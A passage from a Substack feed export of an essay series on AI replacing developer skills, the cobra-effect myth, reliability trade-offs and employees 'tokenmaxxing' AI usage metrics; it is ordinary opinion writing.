them only becomes visible at the moment when the layer below needs to be reasoned about and the capacity to do so is no longer there.</p><p>The retcon reframes this revelation as elevation. The skill deficit that the tools have exposed becomes the proof that the tools are needed, which is true as far as it goes, and which goes considerably less far than the retcon requires it to. What the tools are actually doing to the population using them has been described with some precision by the researchers studying it: the use of coding agents is actively diminishing the very skills needed to effectively manage the coding agents, which is the cobra effect stated at the level of individual cognition, running in real time, visible in the data, and re-described as progress by an industry that has staked too much on the productivity thesis to afford the alternative interpretation.</p><p>Without it, the industry would have to confront what the transition is actually producing, which is not a workforce moving up the stack but a workforce discovering that the stack they thought they were on was shallower than the salary suggested, and that the AI has not so much replaced their skills as revealed the gap between the skills they had and the ones the salary was pricing.</p><h3><strong>No One Expects The Comfy Chair</strong></h3><p>The chair got more comfortable. This is what happened between 2010 and 2024 for a significant portion of the people now asking why they are being laid off. The IDE got smarter. The framework handled the architecture. The autocomplete supplied the syntax. The linter caught the errors. The CI/CD pipeline managed the deployment. Each abstraction layer added comfort to the chair, removed one more reason to understand the layer below, and was experienced as progress because the output kept coming and the salary kept arriving and the title kept accumulating and the understanding kept thinning and nobody was measuring the thinning because the output was the metric and the output was fine and the chair even had a tilt lever. </p><p>PEBKAC (Problem Exists Between Keyboard And Chair) was the help desk&#8217;s sardonic shorthand for user error, the human in the loop as the weakest link, the thing that would be fine if only the person would get out of the way. Agentic tools didn&#8217;t change the acronym. They changed which side of the keyboard the problem was on. The Problem Exists Between Keyboard And Chair, and the chair is a big part of the problem, and the chair is the thing being removed, and the person in the chair spent a decade being told they were moving up the stack while the stack was quietly being built around them in a way that made the chair unnecessary. As comfortable as it was.</p><div><hr></div><h4 style="text-align: center;">Part 4: <a href="/__u/ctolunchnyc.substack.com/p/doing-less-with-more">Doing Less With More</a></h4><div><hr></div><p>The fully footnoted version of this post can be found at <a href="/__u/forestmars.substack.com/i/199228915/developers-developers-developers-developers">antimemetics.blog/developers</a></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe to CTO Lunch NYC </p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p></p>]]></content:encoded></item><item><title><![CDATA[Horse and Buggy Software]]></title><description><![CDATA[Part 2 of Retcon Reckoning (The Great AI Replacement)]]></description><link>https://ctolunchnyc.substack.com/p/horse-and-buggy-software</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/horse-and-buggy-software</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Wed, 27 May 2026 12:59:43 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Plp3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Technology does not eliminate jobs, the received wisdom goes</strong> (and what is received wisdom but a retcon), it relocates them; the received wisdom is not wrong, exactly, in the way that a map is not wrong when it omits the elevation, in describing the territory with enough accuracy to be useful and enough omission to be dangerous, depending on where you are going and how much the climb matters.</p><p>The horse didn&#8217;t survive the automobile as an industry, but the people responsible for the care and feeding of horses became saddled with the job of maintaining the machines needed for the automobile; they became mechanics, and machinists, and assembly line workers, and the vast ecosystem of human labor required to extract oil from the ground and refine it and move it through a distribution network and deliver it to the stations where the cars that needed it could find it, which over the following century produced employment at a scale that the horse economy could not have imagined, and which is the version of the story that gets told, and which despite also being a retcon, is true, as far as it goes.</p><p>What the story tends to gloss over is what happened to the mechanic when the car got computerised. The computer didn&#8217;t eliminate the mechanic. It shifted the mechanic&#8217;s work from the physical diagnosis of mechanical failure&#8212;a task that rewarded accumulated craft knowledge, that got better with decades of practice, that was legible to the person doing it in ways that could be taught and refined and passed on&#8212;to the act of connecting the car to a device and reading what the device said, and then ordering the part the device specified and installing it, which is a different category of work, requiring less judgment, commanding less pay, and carrying less of what the previous version of the job was made of. Rather than disappearing, mechanic got cheaper (on the supply side that is, on the demand side the price of car servicing has increased substantially, as anyone who has received, following a four-minute consultation between a mechanic and a screen, a bill of $1,753.41 before parts and tax, well knows) and the craft that made the mechanic irreplaceable got thinner, and the knowledge that accumulated over a career got shallower, and none of this showed up as unemployment because the person was still employed, doing something still called by the same name, though his coveralls were noticeably cleaner. </p><p>What also got thinner was the mechanic&#8217;s understanding of what the device was reading. The device diagnosed. The mechanic knew how to read the device. These are not the same kind of knowing, and the difference between them becomes visible when the device is wrong; when the fault code points to a sensor and the sensor is fine and the actual problem involves something the device doesn&#8217;t surface, even though the sensor could detect it, something that would have been obvious to the mechanic who could hear it and smell it and feel it through thirty years of accumulated attention to how things fail. That mechanic exists. That mechanic is even more expensive and that mechanic is not the mechanic the diagnostic device made economically rational to employ. </p><blockquote><p>the condition under which &#8220;moving up the stack&#8221; is a description of progress rather than a description of a person standing on a ladder whose lower rungs are being removed.</p></blockquote><p>But someone still had to design the diagnostic device, and the software that ran on the diagnostic device, and the chips the software ran on, and the compilers that translated the code into instructions the chips could execute, and the fabs where the chips were made, and the lithography systems inside the fabs, and the ultra-pure water systems the lithography required, and the supply chains that delivered everything to everything else, and the grid that powered the supply chains, layer beneath layer in a dependency stack that expanded horizontally as it deepened, generating employment at every level, most of it further from the physical world than the level below it, most of it more abstract, most of it more dependent on the layers beneath remaining stable and legible and available to the people working above them, which they were, for a long time, which is the condition under which &#8220;moving up the stack&#8221; is a description of progress rather than a description of a person standing on a ladder whose lower rungs are being removed.</p><p>Meanwhile the software got buggier. As a direct consequence of the same optimization that made the mechanic cheaper: a shift from trying to prevent failures to trying to recover from them faster, which makes complete sense when the systems have grown too complex to keep stable and which produces, as a direct and measurable consequence, more failures, more frequently, in systems that a decreasing number of people understand well enough to articulate. As Mitchell Hashimoto recently observed, the AI infrastructure build-out is repeating the DevOps debate about MTBF (mean time between failures) versus MTTR (mean time to recovery), and the industry appears to be making the same choice DevOps made, which was to optimize for recovery, and not reduced failures.</p><p>Defensible as a choice, but also a choice that accepts failure as a chronic condition and defines success as not staying down too long, which describes a different relationship to reliability than the one the previous generation of engineers was hired to maintain. Anthropic&#8217;s service status page offers a public record of this relationship in practice. The brownouts and degradations that have become a feature of operating at the frontier are not accidents of scale (though Anthropic seems to struggle with them much more than the other labs.) They are the output of a system optimized for recovery, running exactly as designed, at a reliability level the optimization target was designed to accept. The software is buggy on purpose.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!Plp3!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 424w, /__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 848w, /__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 1272w, /__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!Plp3!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png" width="1402" height="1122" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1122,&quot;width&quot;:1402,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:2699992,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/199274060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 424w, /__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 848w, /__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 1272w, /__u/substackcdn.com/image/fetch/$s_!Plp3!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F332afcf0-4cb0-4833-a2da-a6f9319afd09_1402x1122.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p><div><hr></div><h4 style="text-align: center;">Part 3: <a href="/__u/ctolunchnyc.substack.com/p/developers-developers-developers">Developers Developers Developers Developers</a></h4><div><hr></div><p style="text-align: center;"></p><div class="subscription-widget-wrap-editor" data-attrs="{&quot;url&quot;:&quot;https://ctolunchnyc.substack.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe&quot;,&quot;language&quot;:&quot;en&quot;}" data-component-name="SubscribeWidgetToDOM"><div class="subscription-widget show-subscribe"><div class="preamble"><p class="cta-caption">Subscribe to CTO Lunch NYC</p></div><form class="subscription-widget-subscribe"><input type="email" class="email-input" name="email" placeholder="Type your email&#8230;" tabindex="-1"><input type="submit" class="button primary" value="Subscribe"><div class="fake-input-wrapper"><div class="fake-input"></div><div class="fake-button"></div></div></form></div></div><p style="text-align: center;"></p>]]></content:encoded></item><item><title><![CDATA[The Cobra and the Amazon Warehouse ]]></title><description><![CDATA[Part 1 of Retcon Reckoning (The Great AI Replacement)]]></description><link>https://ctolunchnyc.substack.com/p/the-cobra-and-the-amazon-warehouse</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/the-cobra-and-the-amazon-warehouse</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Tue, 26 May 2026 12:59:57 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!m960!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote><p> <em>The fact that the production of cobras had become decoupled from the elimination of cobras was, from the perspective of the metric, largely incidental.</em></p></blockquote><p><strong>The British Raj introduced a bounty on dangerous snakes around 1875</strong>, reasoning, not unreasonably, that if you paid people to bring in dead snakes there would eventually be fewer snakes, which would eventually mean fewer of the approximately nineteen thousand annual deaths that the snake population was extracting from the subcontinent with a consistency that suggested something closer to policy than accident. The logic was the kind that looks airtight in a planning document and considerably less airtight in contact with the people it is intended to incentivize, who are, as they have always been, rational actors operating within the incentive structure they have actually been given rather than the one the planning doc assumed.</p><p>The story you have heard, if you&#8217;ve heard it, goes something like this: the locals bred cobras for the bounty, the British figured this out and cancelled the program, the breeders released their now-worthless inventory into the streets, and the city ended up with considerably <em>more</em> cobras than it started with, in the OG demonstration of <strong>the cobra effect</strong>, which is what happens when your solution becomes the problem, cited approvingly in economics textbooks and airport business books and at least one podcast whose website has become the primary source for a peer-reviewed academic paper, which is a level of epistemic collapse that would have interested the Raj considerably.</p><div class="pullquote"><p><strong>The cobra effect isn&#8217;t that the bounty created more jobs for cobra hunters. <br>It&#8217;s that it created more cobras.</strong></p></div><h3><strong>Is your AI policy breeding Cobras? </strong></h3><p>Amazon warehouse workers, it emerged recently, have been using AI tools to perform tasks they don&#8217;t actually need performed, in order to inflate the usage scores their performance reviews now depend on. When the early reports broke, they focused entirely on the fulfillment center floor: the headlines claimed that Amazon warehouse workers were running fake AI tasks on their terminals to dodge performance metrics. It was a perfect modern fable, conjuring images of blue-collar line workers outsmarting an intrusive algorithmic boss.</p><p>But the truth of what emerged was both weirder and more indicative of corporate panic: the phenomenon wasn&#8217;t happening among the conveyor belts at all. It was playing out three layers up, among Amazon&#8217;s software developers and corporate engineers, who promptly raced to be the first to call it <strong>tokenmaxxing</strong> on social media.</p><p><em>The mandate, by this point, exists everywhere simultaneously and nowhere in particular.</em> Executives announce that the organization must become AI-native to justify billions in capital infrastructure spending. Middle management translates this into utilization targets. Someone, somewhere in executive leadership, decides that if AI adoption is the metric, the mandate should be eighty percent of developers using these tools weekly, and begins tracking token consumption, literally as the raw volume of data processed by a large language model, on internal team dashboards and leaderboards. It was as if a taxicab service started giving bonuses for amount of gas used, but it was a decision that made complete sense in a planning doc and somewhat less sense in contact with the engineers it was designed to incentivize, who are, as previously noted, rational actors operating within the incentive structure they have actually been given and somewhat clever about automating things. </p><p> Somewhere three layers down, an employee spins up an internal agentic platform like <strong>MeshClaw</strong>, an agent built to automate email triaging or Slack interactions, and instructs it to run extraneous, low-value loops purely to burn through data. Because agentic workflows iterate and loop autonomously, they are spectacularly efficient at generating the precise cryptographic exhaust the company is monitoring. The interaction itself has become economically legible in a way the underlying work is not. </p><div class="pullquote"><p style="text-align: center;"><strong>Which is to say: the cobra farm has entered the enterprise.</strong></p></div><p>The difficulty, for leadership, is that the metrics available to measure AI transformation are necessarily proxies. Token consumption. Copilot engagement. Prompt volume. AI-assisted commits. The dashboards are indeed a sight to behold. Though the actual underlying productivity gains remain, in many cases, strangely difficult to locate. Amazon officially maintains that token metrics do not directly factor into performance reviews, but when the numbers are visible to managers on a ranked <strong>leaderboard</strong>, employees recognize the implicit threat. They optimize for the metric to shield themselves from an assumption of underperformance.</p><p>And because organizations optimize around what can be measured rather than what was intended, employees respond accordingly. </p><ul><li><p>A sales organization mandates minimum weekly AI usage targets tied to quarterly reviews. Within two months, representatives begin routing customer call transcripts through summarization agents regardless of whether the summaries are ever consulted again, because unused summaries still count toward utilization. The mandate succeeds. Token consumption triples. Leadership presents the adoption curve at the next board meeting. </p></li><li><p>An engineering organization introduces &#8220;AI-assisted development KPIs&#8221; after reading a consulting report suggesting elite teams will soon generate 40% of production code through copilots.[10] Developers rapidly discover that asking the model to scaffold boilerplate they immediately rewrite still satisfies the reporting layer, while the genuinely difficult architectural work continues happening exactly as before, only now interrupted by the requirement to periodically generate machine-produced code artifacts so the dashboard remains healthy.</p></li><li><p>A customer support department deploys internal agents intended to accelerate ticket resolution. Workers, recognizing that AI interaction frequency has quietly become a managerial signal associated with adaptability and future promotion, begin invoking the agent for tasks already well within their competence, producing longer handling times alongside dramatically improved AI engagement metrics. Leadership concludes adoption is proceeding successfully. </p></li></ul><p>The employee is not resisting the mandate. (We&#8217;ll get to that later.) The employee is complying with the mandate as the organization has operationally defined it, which is always the dangerous moment in any sufficiently abstract transformation initiative. Because &#8220;use AI&#8221; sounds, at the executive layer, like a strategic imperative, but arrives at the operational layer as a measurement system, and measurement systems have a long and distinguished history of producing behavior orthogonal to the outcome they were originally introduced to encourage.</p><div class="callout-block" data-callout="true"><p style="text-align: justify;">The particularly modern wrinkle is that AI adoption generates unusually rich exhaust. Every prompt countable. Every interaction measurable. Every token billable. Meaning organizations suddenly have the managerial narcotic they&#8217;ve always wanted: <strong>the ability to quantify something adjacent to cognition itself.</strong></p></div><p>Somewhere, inevitably, there is already an engineer with a private script named <em>goodhart.py</em> quietly generating synthetic copilot interactions to satisfy an internal token quota imposed by someone three reporting layers above them who has never once opened an IDE themselves. Every sufficiently mature enterprise initiative eventually acquires at least one employee who understands the metric better than the people administering it. The tokenmaxxing cobra farmers across Amazon, Meta, and Microsoft are simply producing exactly what the system requested; had they worked in SaaS, they would have called the repository something like <em>ai-adoption-helper</em> and received a discretionary performance bonus for &#8220;driving organizational transformation.&#8221; </p><p style="text-align: justify;">The fact that the production of tokens has become decoupled from the generation of value is, from the perspective of the metric, largely incidental. And what is being measured is ofc not what is actually happening. Even if it does make for a good story. </p><p>Or at least something adjacent enough to place on a quarterly slide deck.</p><h3>Retcons All The Way Down</h3><blockquote><p><strong>The cobra effect, as universally understood, is itself a retcon</strong></p></blockquote><p>The cobra effect story is tidy. It has its own Wikipedia page. It&#8217;s also historically wrong. Or rather, it&#8217;s a compression that lost the most important information in the encoding. The bounty regarding dangerous snakes started around 1875 and underwent modification around 1895. The goal was to reduce deaths from snakebite, which hovered consistently around 19,000 per year. In 1892, the Raj paid bounties on 84,789 reptiles. In 1893, they paid on 117,120. It was <em>suspected but never proven</em> that people were breeding snakes for profit. More to the point, the death rate barely moved.</p><p>The death rate hovered, with the kind of statistical indifference that suggests the bounty had not so much failed to reduce the snake population as failed to meaningfully interact with it at all. In 1891, 21,389 people died from snake bites. In 1892, with 84,789 reptiles paid for under the bounty, the number was 19,025. In 1893, with 117,120 reptiles paid for, it was 21,213. <strong>The suspicion that people were farming snakes for the bounty was never proven</strong>, and the death rate&#8217;s failure to decline said less about cobra breeding than about the fundamental intractability of nineteen thousand annual deaths in a country of that size and that relationship to its landscape. The bounty was reduced, eventually (not cancelled, reduced) and the death rate did not noticeably respond to that either, because the death rate had its own agenda, which the bounty had never successfully engaged.</p><p>The myth that the locals caused a cobra explosion is a retrospective compression; a way for administrative systems to blame the targets of an intervention for the baseline failure of the intervention itself. It turns out to be retcons all the way down. The internet desperately wanted the &#8220;Amazon warehouse&#8221; narrative to be true because it fits a comfortable, algorithmic-resistance trope: low-wage workers sticking it to the machine by gaming the system. But that narrative serves as a smoke screen for the systemic collapse happening in the corporate tier. The warehouse floor wasn&#8217;t tokenmaxxing; corporate developers were, because upper management bought into an incomplete, top-down model of &#8220;AI transformation&#8221; and needed to justify billions in capital expenditure. When the proxy metrics failed to yield real productivity gains, the system didn&#8217;t question the metrics, it just monitored the boards harder, forcing its highest-paid engineering talent to spend their days behaving like snake farmers.</p><p>What actually had worked in 1890s India wasn&#8217;t the bounty, and it wasn&#8217;t a crackdown on mythical cobra breeders. It was the boots. Farmers in the fields were dying at rates that declined, measurably and specifically, once they started wearing footwear thick enough to stop a fang.</p><p>But nobody talks about the boots, just as nobody wants to talk about the actual code being written at Amazon. The underbrush removal that caused the precise category of adverse effect that good-faith interventions with incomplete models reliably produce, driving rats, and the snakes trailing them, right into the village houses. Nobody talks about that either, because the tidy version, where the subjects are devious, the metrics are absolute, and the failure can be blamed on localized fraud, the story that that incentivisation produces perverse behavior, and perverse behavior destroys the outcome the incentive was designed to produce, sounds like a better story. And better stories circulate faster than the internal Slack logs of a corporate engineering team burning cash to keep a dashboard green, circulate faster than primary sources from the <em>Chambers&#8217;s Journal</em> of 1895, which is not available as a podcast.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!m960!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 424w, /__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 848w, /__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 1272w, /__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!m960!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png" width="1456" height="795" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:795,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:3143493,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://ctolunchnyc.substack.com/i/199271867?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="/__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 424w, /__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 848w, /__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 1272w, /__u/substackcdn.com/image/fetch/$s_!m960!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f575c7d-188b-4038-a9fa-ad10ac08da38_1697x927.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" 